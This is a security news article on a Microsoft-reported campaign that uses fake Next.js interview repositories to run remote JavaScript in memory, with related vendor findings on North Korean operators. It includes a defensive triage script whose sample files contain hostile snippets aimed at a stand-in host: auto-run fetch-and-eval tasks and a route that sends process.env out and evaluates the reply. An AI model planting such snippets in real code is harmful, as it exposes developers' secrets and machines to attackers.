Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware

By Team-CWD, March 6, 2026 (7 min read)

A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.

“The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).

The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running them as part of an assessment process.

Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, share the end goal of executing attacker-controlled JavaScript directly in memory:

  • Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. The task is configured with the runOn: “folderOpen” trigger in the project’s tasks.json, so no further user action is needed.
  • Build‑time execution during application development, where manually running the development server via “npm run dev” is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
  • Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.
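As an added example (not code from Microsoft, Abstract Security or this article), the following Node.js script statically triages a cloned repository for the three execution paths just listed. It runs over a constructed sample tree whose URLs use the reserved example.invalid domain; the signals are heuristics that queue a file for review, not proof of malice.

```javascript
// Added example, not code from Microsoft, Abstract Security or this article: static triage of a
// cloned "interview project" for the three execution paths described above. Input is a map of
// relative path -> UTF-8 text; every signal is a heuristic that queues a file for review, not proof.
const REMOTE_URL = /https?:\/\/[^\s"'`)]+/g;
// eval / new Function / vm.* are what turn fetched text into code running inside the Node process.
const DYNAMIC_EVAL = /\b(eval|new Function|vm\.runIn(ThisContext|NewContext)|vm\.Script)\s*\(/;
// Reading the whole environment object (not one named variable) is the exfiltration signal.
const WHOLE_ENV = /process\.env(?![.\[\w])/;
// Path 1: a task VS Code launches on its own once the folder is opened and trusted.
function auditTasksJson(text) {
  // tasks.json is JSONC, so drop /* */ and whole-line // comments before parsing.
  const json = text.replace(/\/\*[\s\S]*?\*\//g, "").replace(/^\s*\/\/.*$/gm, "");
  let doc; try { doc = JSON.parse(json); } catch { return []; }
  const findings = [];
  for (const task of doc.tasks || []) {
    if (!(task.runOptions && task.runOptions.runOn === "folderOpen")) continue;
    const cmd = [task.command, ...(task.args || [])].filter((a) => typeof a === "string").join(" ");
    const urls = cmd.match(REMOTE_URL) || [];
    findings.push({ kind: urls.length ? "folderOpen-remote-fetch" : "folderOpen-autorun", detail: urls.length ? urls : cmd });
  }
  return findings;
}
// Paths 2 and 3: a JS file that fetches a remote URL and evaluates the reply, optionally
// shipping the whole process environment first (trojaned jquery.min.js, backend route files).
function auditJsSource(text) {
  const findings = [];
  const urls = text.match(REMOTE_URL) || [];
  if (urls.length && DYNAMIC_EVAL.test(text)) findings.push({ kind: "remote-code-eval", detail: urls });
  if (urls.length && WHOLE_ENV.test(text)) findings.push({ kind: "env-exfiltration", detail: urls });
  return findings;
}
function triageFiles(files) {
  return Object.entries(files).flatMap(([file, text]) => {
    const hits = file.endsWith("tasks.json") ? auditTasksJson(text) : /\.(c?m?js|ts)$/.test(file) ? auditJsSource(text) : [];
    return hits.map((h) => ({ file, ...h }));
  });
}

// Constructed sample tree (example.invalid, not real indicators): one file per path plus a clean one.
const SAMPLE_REPO = {
  ".vscode/tasks.json": `{ "version": "2.0.0",
    // VS Code starts this by itself once the folder is trusted
    "tasks": [{ "label": "setup", "type": "shell", "command": "node", "runOptions": { "runOn": "folderOpen" },
      "args": ["-e", "fetch('https://example.invalid/l.js').then(r=>r.text()).then(eval)"] }] }`,
  "public/jquery.min.js": "fetch('https://example.invalid/s').then(r=>r.text()).then(s=>new Function(s)());",
  "pages/api/health.js": "const b=JSON.stringify(process.env);require('https').request('https://example.invalid/r'," +
    "{method:'POST'},r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d));}).end(b);",
  "lib/util.js": "module.exports = () => process.env.NODE_ENV === 'production';",
};
```

Run it over the files of a freshly cloned assessment repository before opening the folder in VS Code or running npm scripts; for path 1 specifically, VS Code’s task.allowAutomaticTasks setting set to “off” stops folderOpen tasks from running at all.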

Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.

It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.

Attack chain overview

“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.”

While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview.

The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network.

Using GitHub gists in VS Code tasks.json instead of Vercel URLs

In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.

The cybersecurity company said it also identified a malicious npm package, named “eslint-validator,” linked to the campaign that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail.

Furthermore, a malicious VS Code task embedded within a GitHub repository has been found to initiate a Windows-only infection chain that runs a batch script to download the Node.js runtime to the host (if it is not already present) and uses the certutil program to decode a block embedded in the script. The decoded script is then executed with the previously obtained Node.js runtime to deploy Python malware protected with PyArmor.

Cybersecurity company Red Asgard, which has also been extensively tracking the campaign, said the threat actors have leveraged crafted VS Code projects that use the runOn: “folderOpen” trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers.

Distribution of staging infrastructure used by North Korean threat actors in 2025

“This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.

To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible.

The development comes as GitLab said it banned 131 unique accounts in 2025 that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole.

“Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.”

In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.

“In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft.

Assessed organization chart of the North Korean IT worker cell

Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members.

“Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted. “This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.”

A GitHub account associated with a North Korean IT worker

In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies, taking advantage of the fact that such companies are unlikely to enforce rigorous background checks.

“Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added. “A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.”
